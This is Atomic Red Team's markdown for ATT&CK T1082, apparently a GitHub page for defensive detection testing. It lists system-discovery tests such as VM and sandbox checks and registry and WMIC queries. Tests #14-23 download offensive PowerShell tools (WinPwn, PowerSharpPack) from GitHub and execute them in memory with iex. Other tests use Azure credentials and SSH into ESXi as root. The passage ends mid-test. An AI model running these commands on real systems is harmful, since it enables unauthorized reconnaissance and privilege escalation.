security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
python_conversion
atomic-red-team/atomics/T1082/T1082.md
T
Atomic Red Team doc generator b3dc12d415 Generated docs from job=generate-docs branch=master [ci skip]
2025-11-05 01:55:34 +00:00

1422 lines
33 KiB
Markdown
Raw Permalink Blame History

# T1082 - System Information Discovery
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1082)
<blockquote>
An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use this information to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. This behavior is distinct from [Local Storage Discovery](https://attack.mitre.org/techniques/T1680) which is an adversary's discovery of local drive, disks and/or volumes.
Tools such as [Systeminfo](https://attack.mitre.org/software/S0096) can be used to gather detailed system information. If running with privileged access, a breakdown of system data can be gathered through the <code>systemsetup</code> configuration tool on macOS. Adversaries may leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to gather detailed system information (e.g. <code>show version</code>).(Citation: US-CERT-TA18-106A) On ESXi servers, threat actors may gather system information from various esxcli utilities, such as `system hostname get` and `system version get`.(Citation: Crowdstrike Hypervisor Jackpotting Pt 2 2021)(Citation: Varonis)
Infrastructure as a Service (IaaS) cloud providers such as AWS, GCP, and Azure allow access to instance and virtual machine information via APIs. Successful authenticated API calls can return data such as the operating system platform and status of a particular instance or the model view of a virtual machine.(Citation: Amazon Describe Instance)(Citation: Google Instances Resource)(Citation: Microsoft Virutal Machine API)
[System Information Discovery](https://attack.mitre.org/techniques/T1082) combined with information gathered from other forms of discovery and reconnaissance can drive payload development and concealment.(Citation: OSX.FairyTale)(Citation: 20 macOS Common Tools and Techniques)
</blockquote>
## Atomic Tests
- [Atomic Test #1 - System Information Discovery](#atomic-test-1---system-information-discovery)
- [Atomic Test #2 - System Information Discovery](#atomic-test-2---system-information-discovery)
- [Atomic Test #3 - List OS Information](#atomic-test-3---list-os-information)
- [Atomic Test #4 - Linux VM Check via Hardware](#atomic-test-4---linux-vm-check-via-hardware)
- [Atomic Test #5 - Linux VM Check via Kernel Modules](#atomic-test-5---linux-vm-check-via-kernel-modules)
- [Atomic Test #6 - FreeBSD VM Check via Kernel Modules](#atomic-test-6---freebsd-vm-check-via-kernel-modules)
- [Atomic Test #7 - Hostname Discovery (Windows)](#atomic-test-7---hostname-discovery-windows)
- [Atomic Test #8 - Hostname Discovery](#atomic-test-8---hostname-discovery)
- [Atomic Test #9 - Windows MachineGUID Discovery](#atomic-test-9---windows-machineguid-discovery)
- [Atomic Test #10 - Griffon Recon](#atomic-test-10---griffon-recon)
- [Atomic Test #11 - Environment variables discovery on windows](#atomic-test-11---environment-variables-discovery-on-windows)
- [Atomic Test #12 - Environment variables discovery on freebsd, macos and linux](#atomic-test-12---environment-variables-discovery-on-freebsd-macos-and-linux)
- [Atomic Test #13 - Show System Integrity Protection status (MacOS)](#atomic-test-13---show-system-integrity-protection-status-macos)
- [Atomic Test #14 - WinPwn - winPEAS](#atomic-test-14---winpwn---winpeas)
- [Atomic Test #15 - WinPwn - itm4nprivesc](#atomic-test-15---winpwn---itm4nprivesc)
- [Atomic Test #16 - WinPwn - Powersploits privesc checks](#atomic-test-16---winpwn---powersploits-privesc-checks)
- [Atomic Test #17 - WinPwn - General privesc checks](#atomic-test-17---winpwn---general-privesc-checks)
- [Atomic Test #18 - WinPwn - GeneralRecon](#atomic-test-18---winpwn---generalrecon)
- [Atomic Test #19 - WinPwn - Morerecon](#atomic-test-19---winpwn---morerecon)
- [Atomic Test #20 - WinPwn - RBCD-Check](#atomic-test-20---winpwn---rbcd-check)
- [Atomic Test #21 - WinPwn - PowerSharpPack - Watson searching for missing windows patches](#atomic-test-21---winpwn---powersharppack---watson-searching-for-missing-windows-patches)
- [Atomic Test #22 - WinPwn - PowerSharpPack - Sharpup checking common Privesc vectors](#atomic-test-22---winpwn---powersharppack---sharpup-checking-common-privesc-vectors)
- [Atomic Test #23 - WinPwn - PowerSharpPack - Seatbelt](#atomic-test-23---winpwn---powersharppack---seatbelt)
- [Atomic Test #24 - Azure Security Scan with SkyArk](#atomic-test-24---azure-security-scan-with-skyark)
- [Atomic Test #25 - Linux List Kernel Modules](#atomic-test-25---linux-list-kernel-modules)
- [Atomic Test #26 - FreeBSD List Kernel Modules](#atomic-test-26---freebsd-list-kernel-modules)
- [Atomic Test #27 - System Information Discovery with WMIC](#atomic-test-27---system-information-discovery-with-wmic)
- [Atomic Test #28 - System Information Discovery](#atomic-test-28---system-information-discovery)
- [Atomic Test #29 - Check computer location](#atomic-test-29---check-computer-location)
- [Atomic Test #30 - BIOS Information Discovery through Registry](#atomic-test-30---bios-information-discovery-through-registry)
- [Atomic Test #31 - ESXi - VM Discovery using ESXCLI](#atomic-test-31---esxi---vm-discovery-using-esxcli)
- [Atomic Test #32 - ESXi - Darkside system information discovery](#atomic-test-32---esxi---darkside-system-information-discovery)
- [Atomic Test #33 - sysctl to gather macOS hardware info](#atomic-test-33---sysctl-to-gather-macos-hardware-info)
- [Atomic Test #34 - operating system discovery ](#atomic-test-34---operating-system-discovery-)
- [Atomic Test #35 - Check OS version via "ver" command](#atomic-test-35---check-os-version-via-ver-command)
- [Atomic Test #36 - Display volume shadow copies with "vssadmin"](#atomic-test-36---display-volume-shadow-copies-with-vssadmin)
- [Atomic Test #37 - Identify System Locale and Regional Settings with PowerShell](#atomic-test-37---identify-system-locale-and-regional-settings-with-powershell)
- [Atomic Test #38 - Enumerate Available Drives via gdr](#atomic-test-38---enumerate-available-drives-via-gdr)
- [Atomic Test #39 - Discover OS Product Name via Registry](#atomic-test-39---discover-os-product-name-via-registry)
- [Atomic Test #40 - Discover OS Build Number via Registry](#atomic-test-40---discover-os-build-number-via-registry)
<br/>
## Atomic Test #1 - System Information Discovery
Identify System Info. Upon execution, system info and time info will be displayed.
**Supported Platforms:** Windows
**auto_generated_guid:** 66703791-c902-4560-8770-42b8a91f7667
#### Attack Commands: Run with `command_prompt`!
```cmd
systeminfo
reg query HKLM\SYSTEM\CurrentControlSet\Services\Disk\Enum
```
<br/>
<br/>
## Atomic Test #2 - System Information Discovery
Identify System Info
**Supported Platforms:** macOS
**auto_generated_guid:** edff98ec-0f73-4f63-9890-6b117092aff6
#### Attack Commands: Run with `sh`!
```sh
system_profiler
ls -al /Applications
```
<br/>
<br/>
## Atomic Test #3 - List OS Information
Identify System Info
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** cccb070c-df86-4216-a5bc-9fb60c74e27c
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Output file used to store the results. | path | /tmp/T1082.txt|
#### Attack Commands: Run with `sh`!
```sh
uname -a >> #{output_file}
if [ -f /etc/lsb-release ]; then cat /etc/lsb-release >> #{output_file}; fi
if [ -f /etc/redhat-release ]; then cat /etc/redhat-release >> #{output_file}; fi
if [ -f /etc/issue ]; then cat /etc/issue >> #{output_file}; fi
if [ -f /etc/os-release ]; then cat /etc/os-release >> #{output_file}; fi
uptime >> #{output_file}
cat #{output_file} 2>/dev/null
```
#### Cleanup Commands:
```sh
rm #{output_file} 2>/dev/null
```
<br/>
<br/>
## Atomic Test #4 - Linux VM Check via Hardware
Identify virtual machine hardware. This technique is used by the Pupy RAT and other malware.
**Supported Platforms:** Linux
**auto_generated_guid:** 31dad7ad-2286-4c02-ae92-274418c85fec
#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin)
```bash
if [ -f /sys/class/dmi/id/bios_version ]; then cat /sys/class/dmi/id/bios_version | grep -i amazon; fi
if [ -f /sys/class/dmi/id/product_name ]; then cat /sys/class/dmi/id/product_name | grep -i "Droplet\|HVM\|VirtualBox\|VMware"; fi
if [ -f /sys/class/dmi/id/chassis_vendor ]; then cat /sys/class/dmi/id/chassis_vendor | grep -i "Xen\|Bochs\|QEMU"; fi
if [ -x "$(command -v dmidecode)" ]; then sudo dmidecode | grep -i "microsoft\|vmware\|virtualbox\|quemu\|domu"; fi
if [ -f /proc/scsi/scsi ]; then cat /proc/scsi/scsi | grep -i "vmware\|vbox"; fi
if [ -f /proc/ide/hd0/model ]; then cat /proc/ide/hd0/model | grep -i "vmware\|vbox\|qemu\|virtual"; fi
if [ -x "$(command -v lspci)" ]; then sudo lspci | grep -i "vmware\|virtualbox"; fi
if [ -x "$(command -v lscpu)" ]; then sudo lscpu | grep -i "Xen\|KVM\|Microsoft"; fi
```
<br/>
<br/>
## Atomic Test #5 - Linux VM Check via Kernel Modules
Identify virtual machine guest kernel modules. This technique is used by the Pupy RAT and other malware.
**Supported Platforms:** Linux
**auto_generated_guid:** 8057d484-0fae-49a4-8302-4812c4f1e64e
#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin)
```bash
sudo lsmod | grep -i "vboxsf\|vboxguest"
sudo lsmod | grep -i "vmw_baloon\|vmxnet"
sudo lsmod | grep -i "xen-vbd\|xen-vnif"
sudo lsmod | grep -i "virtio_pci\|virtio_net"
sudo lsmod | grep -i "hv_vmbus\|hv_blkvsc\|hv_netvsc\|hv_utils\|hv_storvsc"
```
<br/>
<br/>
## Atomic Test #6 - FreeBSD VM Check via Kernel Modules
Identify virtual machine host kernel modules.
**Supported Platforms:** Linux
**auto_generated_guid:** eefe6a49-d88b-41d8-8fc2-b46822da90d3
#### Attack Commands: Run with `sh`!
```sh
kldstat | grep -i "vmm"
kldstat | grep -i "vbox"
```
<br/>
<br/>
## Atomic Test #7 - Hostname Discovery (Windows)
Identify system hostname for Windows. Upon execution, the hostname of the device will be displayed.
**Supported Platforms:** Windows
**auto_generated_guid:** 85cfbf23-4a1e-4342-8792-007e004b975f
#### Attack Commands: Run with `command_prompt`!
```cmd
hostname
```
<br/>
<br/>
## Atomic Test #8 - Hostname Discovery
Identify system hostname for FreeBSD, Linux and macOS systems.
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** 486e88ea-4f56-470f-9b57-3f4d73f39133
#### Attack Commands: Run with `sh`!
```sh
hostname
```
<br/>
<br/>
## Atomic Test #9 - Windows MachineGUID Discovery
Identify the Windows MachineGUID value for a system. Upon execution, the machine GUID will be displayed from registry.
**Supported Platforms:** Windows
**auto_generated_guid:** 224b4daf-db44-404e-b6b2-f4d1f0126ef8
#### Attack Commands: Run with `command_prompt`!
```cmd
REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography /v MachineGuid
```
<br/>
<br/>
## Atomic Test #10 - Griffon Recon
This script emulates the reconnaissance script seen in used by Griffon and was modified by security researcher Kirk Sayre
in order simply print the recon results to the screen as opposed to exfiltrating them. [Script](https://gist.github.com/kirk-sayre-work/7cb5bf4e2c7c77fa5684ddc17053f1e5).
For more information see also [https://malpedia.caad.fkie.fraunhofer.de/details/js.griffon](https://malpedia.caad.fkie.fraunhofer.de/details/js.griffon) and [https://attack.mitre.org/software/S0417/](https://attack.mitre.org/software/S0417/)
**Supported Platforms:** Windows
**auto_generated_guid:** 69bd4abe-8759-49a6-8d21-0f15822d6370
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| vbscript | Path to sample script | string | PathToAtomicsFolder&#92;T1082&#92;src&#92;griffon_recon.vbs|
#### Attack Commands: Run with `powershell`!
```powershell
cscript "#{vbscript}"
```
#### Dependencies: Run with `powershell`!
##### Description: Sample script file must exist on disk at specified location (#{vbscript})
##### Check Prereq Commands:
```powershell
if (Test-Path "#{vbscript}") {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory (split-path "#{vbscript}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1082/src/griffon_recon.vbs" -OutFile "#{vbscript}"
```
<br/>
<br/>
## Atomic Test #11 - Environment variables discovery on windows
Identify all environment variables. Upon execution, environments variables and your path info will be displayed.
**Supported Platforms:** Windows
**auto_generated_guid:** f400d1c0-1804-4ff8-b069-ef5ddd2adbf3
#### Attack Commands: Run with `command_prompt`!
```cmd
set
```
<br/>
<br/>
## Atomic Test #12 - Environment variables discovery on freebsd, macos and linux
Identify all environment variables. Upon execution, environments variables and your path info will be displayed.
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** fcbdd43f-f4ad-42d5-98f3-0218097e2720
#### Attack Commands: Run with `sh`!
```sh
env
```
<br/>
<br/>
## Atomic Test #13 - Show System Integrity Protection status (MacOS)
Read and Display System Intergrety Protection status. csrutil is commonly used by malware and post-exploitation tools to determine whether certain files and directories on the system are writable or not.
**Supported Platforms:** macOS
**auto_generated_guid:** 327cc050-9e99-4c8e-99b5-1d15f2fb6b96
#### Attack Commands: Run with `sh`!
```sh
csrutil status
```
<br/>
<br/>
## Atomic Test #14 - WinPwn - winPEAS
Discover Local Privilege Escalation possibilities using winPEAS function of WinPwn
**Supported Platforms:** Windows
**auto_generated_guid:** eea1d918-825e-47dd-acc2-814d6c58c0e1
#### Attack Commands: Run with `powershell`!
```powershell
$S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
winPEAS -noninteractive -consoleoutput
```
<br/>
<br/>
## Atomic Test #15 - WinPwn - itm4nprivesc
Discover Local Privilege Escalation possibilities using itm4nprivesc function of WinPwn
**Supported Platforms:** Windows
**auto_generated_guid:** 3d256a2f-5e57-4003-8eb6-64d91b1da7ce
#### Attack Commands: Run with `powershell`!
```powershell
$S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
itm4nprivesc -noninteractive -consoleoutput
```
<br/>
<br/>
## Atomic Test #16 - WinPwn - Powersploits privesc checks
Powersploits privesc checks using oldchecks function of WinPwn
**Supported Platforms:** Windows
**auto_generated_guid:** 345cb8e4-d2de-4011-a580-619cf5a9e2d7
#### Attack Commands: Run with `powershell`!
```powershell
$S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
oldchecks -noninteractive -consoleoutput
```
#### Cleanup Commands:
```powershell
rm -force -recurse .\DomainRecon -ErrorAction Ignore
rm -force -recurse .\Exploitation -ErrorAction Ignore
rm -force -recurse .\LocalPrivEsc -ErrorAction Ignore
rm -force -recurse .\LocalRecon -ErrorAction Ignore
rm -force -recurse .\Vulnerabilities -ErrorAction Ignore
```
<br/>
<br/>
## Atomic Test #17 - WinPwn - General privesc checks
General privesc checks using the otherchecks function of WinPwn
**Supported Platforms:** Windows
**auto_generated_guid:** 5b6f39a2-6ec7-4783-a5fd-2c54a55409ed
#### Attack Commands: Run with `powershell`!
```powershell
$S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
otherchecks -noninteractive -consoleoutput
```
<br/>
<br/>
## Atomic Test #18 - WinPwn - GeneralRecon
Collect general computer informations via GeneralRecon function of WinPwn
**Supported Platforms:** Windows
**auto_generated_guid:** 7804659b-fdbf-4cf6-b06a-c03e758590e8
#### Attack Commands: Run with `powershell`!
```powershell
$S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Generalrecon -consoleoutput -noninteractive
```
<br/>
<br/>
## Atomic Test #19 - WinPwn - Morerecon
Gathers local system information using the Morerecon function of WinPwn
**Supported Platforms:** Windows
**auto_generated_guid:** 3278b2f6-f733-4875-9ef4-bfed34244f0a
#### Attack Commands: Run with `powershell`!
```powershell
$S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Morerecon -noninteractive -consoleoutput
```
<br/>
<br/>
## Atomic Test #20 - WinPwn - RBCD-Check
Search for Resource-Based Constrained Delegation attack paths using RBCD-Check function of WinPwn
**Supported Platforms:** Windows
**auto_generated_guid:** dec6a0d8-bcaf-4c22-9d48-2aee59fb692b
#### Attack Commands: Run with `powershell`!
```powershell
$S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
RBCD-Check -consoleoutput -noninteractive
```
<br/>
<br/>
## Atomic Test #21 - WinPwn - PowerSharpPack - Watson searching for missing windows patches
PowerSharpPack - Watson searching for missing windows patches technique via function of WinPwn
**Supported Platforms:** Windows
**auto_generated_guid:** 07b18a66-6304-47d2-bad0-ef421eb2e107
#### Attack Commands: Run with `powershell`!
```powershell
$S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-SharpWatson.ps1')
Invoke-watson
```
<br/>
<br/>
## Atomic Test #22 - WinPwn - PowerSharpPack - Sharpup checking common Privesc vectors
PowerSharpPack - Sharpup checking common Privesc vectors technique via function of WinPwn - Takes several minutes to complete.
**Supported Platforms:** Windows
**auto_generated_guid:** efb79454-1101-4224-a4d0-30c9c8b29ffc
#### Attack Commands: Run with `powershell`!
```powershell
$S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-SharpUp.ps1')
Invoke-SharpUp -command "audit"
```
<br/>
<br/>
## Atomic Test #23 - WinPwn - PowerSharpPack - Seatbelt
PowerSharpPack - Seatbelt technique via function of WinPwn.
[Seatbelt](https://github.com/GhostPack/Seatbelt) is a C# project that performs a number of security oriented host-survey "safety checks" relevant from both offensive and defensive security perspectives.
**Supported Platforms:** Windows
**auto_generated_guid:** 5c16ceb4-ba3a-43d7-b848-a13c1f216d95
#### Attack Commands: Run with `powershell`!
```powershell
$S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Seatbelt.ps1')
Invoke-Seatbelt -Command "-group=all"
```
<br/>
<br/>
## Atomic Test #24 - Azure Security Scan with SkyArk
Upon successful execution, this test will utilize a valid read-only Azure AD user's credentials to conduct a security scan and determine what users exist in a given tenant, as well as identify any admin users.
Once the test is complete, a folder will be output to the temp directory that contains 3 csv files which provide info on the discovered users.
See https://github.com/cyberark/SkyArk
**Supported Platforms:** Azure-ad
**auto_generated_guid:** 26a18d3d-f8bc-486b-9a33-d6df5d78a594
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| username | Azure AD username | string | |
| password | Azure AD password | string | T1082Az|
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
Import-Module "PathToAtomicsFolder\..\ExternalPayloads\AzureStealth.ps1" -force
$Password = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Password
Connect-AzAccount -Credential $Credential
Connect-AzureAD -Credential $Credential
Scan-AzureAdmins -UseCurrentCred
```
#### Cleanup Commands:
```powershell
$resultstime = Get-Date -Format "yyyyMMdd"
$resultsfolder = ("Results-" + $resultstime)
remove-item $env:temp\$resultsfolder -recurse -force -erroraction silentlycontinue
```
#### Dependencies: Run with `powershell`!
##### Description: The SkyArk AzureStealth module must exist in PathToAtomicsFolder\..\ExternalPayloads.
##### Check Prereq Commands:
```powershell
if (test-path "PathToAtomicsFolder\..\ExternalPayloads\AzureStealth.ps1"){exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
invoke-webrequest "https://raw.githubusercontent.com/cyberark/SkyArk/3293ee145e95061a8980dd7b5da0030edc4da5c0/AzureStealth/AzureStealth.ps1" -outfile "PathToAtomicsFolder\..\ExternalPayloads\AzureStealth.ps1"
```
##### Description: The AzureAD module must be installed.
##### Check Prereq Commands:
```powershell
try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
```
##### Get Prereq Commands:
```powershell
Install-Module -Name AzureAD -Force
```
##### Description: The Az module must be installed.
##### Check Prereq Commands:
```powershell
try {if (Get-InstalledModule -Name Az -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
```
##### Get Prereq Commands:
```powershell
Install-Module -Name Az -Force
```
<br/>
<br/>
## Atomic Test #25 - Linux List Kernel Modules
Enumerate kernel modules installed 3 different ways. Upon successful execution stdout will display kernel modules installed on host 2 times, followed by list of modules matching 'vmw' if present.
**Supported Platforms:** Linux
**auto_generated_guid:** 034fe21c-3186-49dd-8d5d-128b35f181c7
#### Attack Commands: Run with `sh`!
```sh
lsmod
kmod list
grep vmw /proc/modules
```
<br/>
<br/>
## Atomic Test #26 - FreeBSD List Kernel Modules
Enumerate kernel modules loaded. Upon successful execution stdout will display kernel modules loaded, followed by list of modules matching 'vmm' if present.
**Supported Platforms:** Linux
**auto_generated_guid:** 4947897f-643a-4b75-b3f5-bed6885749f6
#### Attack Commands: Run with `sh`!
```sh
kldstat
kldstat | grep vmm
```
<br/>
<br/>
## Atomic Test #27 - System Information Discovery with WMIC
Identify system information with the WMI command-line (WMIC) utility. Upon execution, various system information will be displayed, including: OS, CPU, GPU, and disk drive names; memory capacity; display resolution; and baseboard, BIOS, and GPU driver products/versions.
https://nwgat.ninja/getting-system-information-with-wmic-on-windows/
Elements of this test were observed in the wild used by Aurora Stealer in late 2022 and early 2023, as highlighted in public reporting:
https://blog.sekoia.io/aurora-a-rising-stealer-flying-under-the-radar
https://blog.cyble.com/2023/01/18/aurora-a-stealer-using-shapeshifting-tactics/
**Supported Platforms:** Windows
**auto_generated_guid:** 8851b73a-3624-4bf7-8704-aa312411565c
#### Attack Commands: Run with `command_prompt`!
```cmd
wmic cpu get name
wmic MEMPHYSICAL get MaxCapacity
wmic baseboard get product
wmic baseboard get version
wmic bios get SMBIOSBIOSVersion
wmic path win32_VideoController get name
wmic path win32_VideoController get DriverVersion
wmic path win32_VideoController get VideoModeDescription
wmic OS get Caption,OSArchitecture,Version
wmic DISKDRIVE get Caption
Get-WmiObject win32_bios
```
<br/>
<br/>
## Atomic Test #28 - System Information Discovery
The script gathernetworkinfo.vbs is employed to collect system information such as the operating system, DNS details, firewall configuration, etc. Outputs are stored in c:\Windows\System32\config or c:\Windows\System32\reg. https://www.verboon.info/2011/06/the-gathernetworkinfo-vbs-script/
**Supported Platforms:** Windows
**auto_generated_guid:** 4060ee98-01ae-4c8e-8aad-af8300519cc7
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
wscript.exe C:\Windows\System32\gatherNetworkInfo.vbs
```
<br/>
<br/>
## Atomic Test #29 - Check computer location
Looks up country code configured in the registry, likely geofence. Upon execution, country code info will be displayed.
- https://tria.ge/210111-eaz8mqhgh6/behavioral1
**Supported Platforms:** Windows
**auto_generated_guid:** 96be6002-9200-47db-94cb-c3e27de1cb36
#### Attack Commands: Run with `command_prompt`!
```cmd
reg query "HKEY_CURRENT_USER\Control Panel\International\Geo"
```
<br/>
<br/>
## Atomic Test #30 - BIOS Information Discovery through Registry
Looks up for BIOS information in the registry. BIOS information is often read in order to detect sandboxing environments. Upon execution, BIOS information will be displayed.
- https://tria.ge/210111-eaz8mqhgh6/behavioral1
- https://evasions.checkpoint.com/techniques/registry.html
**Supported Platforms:** Windows
**auto_generated_guid:** f2f91612-d904-49d7-87c2-6c165d23bead
#### Attack Commands: Run with `command_prompt`!
```cmd
reg query HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System /v SystemBiosVersion
reg query HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System /v VideoBiosVersion
```
<br/>
<br/>
## Atomic Test #31 - ESXi - VM Discovery using ESXCLI
An adversary will using ESXCLI to enumerate the Virtual Machines on the host prior to executing power off routine.
[Reference](https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/)
**Supported Platforms:** Windows
**auto_generated_guid:** 2040405c-eea6-4c1c-aef3-c2acc430fac9
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| vm_host | Specify the host name or IP of the ESXi Server | string | atomic.local|
| vm_user | Specify the privilege user account on ESXi Server | string | root|
| vm_pass | Specify the privilege user password on ESXi Server | string | pass|
| plink_file | Path to Plink | path | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;plink.exe|
| cli_script | Path to file with discovery commands | path | PathToAtomicsFolder&#92;T1082&#92;src&#92;esx_vmdiscovery.txt|
#### Attack Commands: Run with `command_prompt`!
```cmd
echo "" | "#{plink_file}" "#{vm_host}" -ssh -l "#{vm_user}" -pw "#{vm_pass}" -m "#{cli_script}"
```
#### Dependencies: Run with `powershell`!
##### Description: Check if plink is available.
##### Check Prereq Commands:
```powershell
if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
```
<br/>
<br/>
## Atomic Test #32 - ESXi - Darkside system information discovery
Darkside ransomware utilises various ESXCLI commands to obtain information about the ESXi Host.
[Reference](https://www.trendmicro.com/en_ph/research/21/e/darkside-linux-vms-targeted.html)
**Supported Platforms:** Windows
**auto_generated_guid:** f89812e5-67d1-4f49-86fa-cbc6609ea86a
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| vm_host | Specify the host name or IP of the ESXi Server | string | atomic.local|
| vm_user | Specify the privilege user account on ESXi Server | string | root|
| vm_pass | Specify the privilege user password on ESXi Server | string | pass|
| plink_file | Path to Plink | path | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;plink.exe|
| cli_script | Path to file containing darkside ransomware discovery commands | path | PathToAtomicsFolder&#92;T1082&#92;src&#92;esx_darkside_discovery.txt|
#### Attack Commands: Run with `command_prompt`!
```cmd
echo "" | "#{plink_file}" "#{vm_host}" -ssh -l "#{vm_user}" -pw "#{vm_pass}" -m "#{cli_script}"
```
#### Dependencies: Run with `powershell`!
##### Description: Check if plink is available.
##### Check Prereq Commands:
```powershell
if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
```
<br/>
<br/>
## Atomic Test #33 - sysctl to gather macOS hardware info
Gets the macOS hardware information, which can be used to determine whether the target macOS host is running on a physical or virtual machine. sysctl can be used to gather interesting macOS host data, including hardware information, memory size, logical cpu information, etc.
**Supported Platforms:** macOS
**auto_generated_guid:** c8d40da9-31bd-47da-a497-11ea55d1ef6c
#### Attack Commands: Run with `sh`!
```sh
sysctl -n hw.model
```
<br/>
<br/>
## Atomic Test #34 - operating system discovery
operating system discovery using get-ciminstance
https://petri.com/getting-operating-system-information-powershell/
**Supported Platforms:** Windows
**auto_generated_guid:** 70e13ef4-5a74-47e4-9d16-760b41b0e2db
#### Attack Commands: Run with `powershell`!
```powershell
Get-CimInstance Win32_OperatingSystem | Select-Object Caption, Version, ServicePackMajorVersion, OSArchitecture, CSName, WindowsDirectory | Out-null
```
<br/>
<br/>
## Atomic Test #35 - Check OS version via "ver" command
Ver command shows information about os version.
**Supported Platforms:** Windows
**auto_generated_guid:** f6ecb109-df24-4303-8d85-1987dbae6160
#### Attack Commands: Run with `command_prompt`!
```cmd
ver
```
<br/>
<br/>
## Atomic Test #36 - Display volume shadow copies with "vssadmin"
The command shows all available volume shadow copies, along with their creation time and location.
**Supported Platforms:** Windows
**auto_generated_guid:** 7161b085-816a-491f-bab4-d68e974b7995
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
vssadmin.exe list shadows
```
<br/>
<br/>
## Atomic Test #37 - Identify System Locale and Regional Settings with PowerShell
This action demonstrates how an attacker might gather a system's region and language settings using PowerShell, which could aid in profiling
the machine's location and user language preferences. The command outputs system locale details to a temporary file for further analysis.
**Supported Platforms:** Windows
**auto_generated_guid:** ce479c1a-e8fa-42b2-812a-96b0f2f4d28a
#### Attack Commands: Run with `command_prompt`!
```cmd
